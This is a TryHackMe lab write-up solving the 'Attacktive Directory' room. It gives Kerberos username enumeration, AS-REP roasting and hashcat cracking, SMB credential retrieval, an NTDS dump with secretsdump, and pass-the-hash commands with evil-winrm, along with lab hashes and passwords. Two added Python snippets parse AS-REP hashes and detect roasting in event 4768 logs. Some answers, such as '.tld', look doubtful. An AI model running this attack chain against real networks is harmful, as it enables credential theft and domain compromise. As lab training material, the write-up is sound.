Attacktive Directory TryHackMe Writeup by SyntheticVoid

SyntheticSecurity
4 min read, May 17, 2023

Attacktive Directory — https://tryhackme.com/room/attacktivedirectory

The following is my write-up of how I solved and finished the Attacktive Directory TryHackMe room, which is introduced as: “99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?”

Task 3:

1. What tool will allow us to enumerate port 139/445?

enum4linux, which comes preinstalled with most versions of Linux

2. What is the NetBIOS-Domain Name of the machine?

enum4linux -a 10.10.70.170

nmap -A 10.10.70.170

Found: spookysec.local0 / ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local

NetBIOS_Domain_Name: THM-AD

3. What invalid TLD do people commonly use for their Active Directory Domain?

.tld

Task 4:

· Installed Go with the following steps: https://medium.com/@startswithme22/how-to-install-go-programming-language-on-linux-c7835698f3a0

· Then installed Kerbrute with:

· go install github.com/ropnop/kerbrute@latest

· Navigate to the binary directory: cd ~/go/bin

· Then you can launch commands with it via:

o ./kerbrute --help , etc

1. What command within Kerbrute will allow us to enumerate valid usernames?

userenum

2 & 3. What notable accounts are discovered?

cd ~/go/bin

Run: sudo ./kerbrute userenum --dc 10.10.28.244 -d spookysec.local userlist.txt -t 100

You have to give the domain controller's IP explicitly so the tool knows where to send its requests; if we wanted to associate the IP with the domain name instead, we could add a hosts entry like:
sudo /bin/sh -c 'echo "10.10.141.109 spookysec.local" >> /etc/hosts'

svc-admin / backup

Task 5

1. We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

a. svc-admin

2. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

a. Kerberos 5, etype 23, AS-REP

- Got here with the following command:

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass

- We then get : $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:54eb8ddb81888cc5c8838ca42443c0aa$0e719141fc76ecdae558ad24fa980704f86f2d4f63b0691123e3be1590becbff97f72c42756e52c6a07dba7cfb7c574b8d6f855ad461ed83f12a0a25b6354dec6849d3bed34721409be836d8f16fa7ce7e22b95bbbdc27f58a7cdd40efb6fc10b7ca8f2cfdce8d1ddcc4078e4ba8ae32d4e083a011147f0bd2c5225ca2eb0ff47fadfcd8979aa67e99cf457abd3d6d2fba786a8d01ebbfb10e1b1c6c6df5a5ab5b1dff730873fc4b05888e742eccaed7cfdcb2aca58c99a452aee9aa3db5e78c7f0b5f8150a9d08f4a75c9cfad47f00378b7369baff46f758c13f7b112563d51075c5918d15e88e6ca883d1530ea31713abc

- After reviewing https://hashcat.net/wiki/doku.php?id=example_hashes we find the matching example hash begins with $krb5asrep$23$, which corresponds to the start of our hash, $krb5asrep$23$svc-…
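To see what the pieces of that line are and why it maps to mode 18200, here is an added Python helper that is not part of the original post: it pulls the hashcat-format lines out of GetNPUsers output and splits them into principal, realm, etype, checksum and encrypted part. The sample output below is constructed, using the page's principal but a made-up checksum and encrypted part.

```python
import re

# hashcat mode 18200 layout as emitted by GetNPUsers (-format hashcat, the default):
#   $krb5asrep$<etype>$<user>@<REALM>:<checksum hex>$<enc-part hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$"
    r"(?P<user>[^@:$]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Constructed sample of GetNPUsers output (not real capture data): one account that
# still requires pre-authentication, one AS-REP line for svc-admin.
SAMPLE_OUTPUT = """\
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:00112233445566778899aabbccddeeff$""" + \
    "0123456789abcdef" * 4 + "\n"


def parse_asrep_hash(line):
    """Split one $krb5asrep$ line into its fields; raise ValueError if it is not one."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    d = m.groupdict()
    d["etype"] = int(d["etype"])
    # Only the etype on the page is mapped; other etypes use different hashcat modes.
    d["hashcat_mode"] = 18200 if d["etype"] == 23 else None
    # The 32 hex chars before '$' are the 16-byte HMAC-MD5 checksum; the rest is the
    # RC4-encrypted enc-part of the AS-REP that the cracker tries candidate keys against.
    d["checksum_bytes"] = len(d["checksum"]) // 2
    d["edata_bytes"] = len(d["edata"]) // 2
    return d


def extract_asrep_hashes(text):
    """Return parsed dicts for every hash line in GetNPUsers output, skipping status lines."""
    out = []
    for line in text.splitlines():
        if line.startswith("$krb5asrep$"):
            out.append(parse_asrep_hash(line))
    return out


if __name__ == "__main__":
    for h in extract_asrep_hashes(SAMPLE_OUTPUT):
        print(h["user"], h["realm"], "etype", h["etype"], "mode", h["hashcat_mode"])
```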

3. What mode is the hash?

a. 18200

4. Now crack the hash with the modified password list provided, what is the user accounts password?

a. management2005

We create a hash file with the following command:

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass > /home/admin2/THEHASH

- This creates a file named THEHASH with the hash inside it; from here we can run the following:

sudo hashcat -m 18200 /home/admin2/THEHASH passwordlist.txt --force

- This outputs the cracked password, management2005.

- After reviewing the README for Kerbrute, https://github.com/ropnop/kerbrute/blob/master/README.md, I found the following: “Bruteforcing windows passwords with Kerberos is much faster than any other approach, and potentially stealthier since pre-authentication failures do not trigger that traditional ‘an account failed to log on’ event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller).”
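Because neither the username enumeration nor the AS-REP request above shows up as a 4625, a defender watches the domain controller's event 4768 (TGT requested) instead: a successful request with Pre-Authentication Type 0 and RC4 ticket encryption (0x17) is the footprint the GetNPUsers -no-pass step leaves. This is an added example, not from the original post; the event texts are constructed and follow the field names of the 4768 message body.

```python
import re

# Constructed 4768 message bodies (not real log data). The first is what an AS-REP
# roast request for svc-admin would look like; the second is a normal user logon.
SAMPLE_4768_EVENTS = [
    """Account Name: svc-admin
Supplied Realm Name: spookysec.local
Client Address: ::ffff:10.10.14.5
Result Code: 0x0
Ticket Encryption Type: 0x17
Pre-Authentication Type: 0""",
    """Account Name: jdoe
Supplied Realm Name: spookysec.local
Client Address: ::ffff:10.10.14.20
Result Code: 0x0
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2""",
]

# One "Field: value" pair per line; keys are words and spaces, values run to end of line.
FIELD_RE = re.compile(r"^\s*([A-Za-z -]+?):\s*(\S.*)$", re.MULTILINE)


def parse_event(text):
    """Turn the 'Field: value' lines of a 4768 message into a dict."""
    return {k.strip(): v.strip() for k, v in FIELD_RE.findall(text)}


def is_asrep_roast_candidate(ev):
    """No pre-auth (type 0), RC4 ticket (0x17) and success: an AS-REP handed out
    without a password ever being presented."""
    return (ev.get("Pre-Authentication Type") == "0"
            and ev.get("Ticket Encryption Type", "").lower() == "0x17"
            and ev.get("Result Code", "").lower() == "0x0")


def find_asrep_roast_candidates(events):
    """Return (account, client address) for each event matching the roast pattern."""
    hits = []
    for text in events:
        ev = parse_event(text)
        if is_asrep_roast_candidate(ev):
            hits.append((ev["Account Name"], ev.get("Client Address", "?")))
    return hits


if __name__ == "__main__":
    for account, client in find_asrep_roast_candidates(SAMPLE_4768_EVENTS):
        print(f"AS-REP without pre-auth: {account} from {client}")
```

In a real deployment the same test runs over the Security log of every DC, and the accounts it returns are the ones whose "Do not require Kerberos preauthentication" setting should be reviewed.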

Task 6

1. What utility can we use to map remote SMB shares?

a. smbclient

2. Which option will list shares?

a. -L

3. How many remote shares is the server listing?

a. 6

We find this with the following command:

smbclient -L 10.10.158.253 -U THM-AD/svc-admin%management2005

4. There is one particular share that we have access to that contains a text file. Which share is it?

a. Backup

We find this with the following command which will let us access the folder:

smbclient \\\\10.10.158.253\\backup -U THM-AD/svc-admin%management2005

5. What is the content of the file?

a. YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

We find this with the following command:

· help

· Found get, which seems promising since wget isn’t working

· get backup_credentials.txt

· Back on the local Kali VM: cat backup_credentials.txt

· Answer: YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

6. Decoding the contents of the file, what is the full contents?

a. backup@spookysec.local:backup2517860

· Open CyberChef and decode the Base64 string

Task 7

1. What method allowed us to dump NTDS.DIT?

cd /opt/impacket/examples

sudo python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc backup@10.10.141.109

Pass: backup2517860

2. What is the Administrators NTLM hash?

We find the line Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: in the dump. The NTLM hash is the second hash field (the first is the empty LM hash), so it’s: 0e0363213e37b94221497260b0bcb4fc

3. What method of attack could allow us to authenticate as the user without the password?

· Pass the hash

4. Using a tool called Evil-WinRM what option will allow us to use a hash?

Installed with: gem install evil-winrm. The hash is supplied with the -H option, as in the Task 8 command.

Task 8

1. Get flag for svc-admin : TryHackMe{K3rb3r0s_Pr3_4uth}

sudo evil-winrm -i 10.10.141.109 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

- For some reason it wouldn’t let me log in with the svc-admin NTLM hash, only Administrator’s

2. Get flag for backup : TryHackMe{B4ckM3UpSc0tty!}

3. Get flag for Administrator : TryHackMe{4ctiveD1rectoryM4st3r}

SyntheticSecurity: threat and malware research, analyst, ramblings on technology and history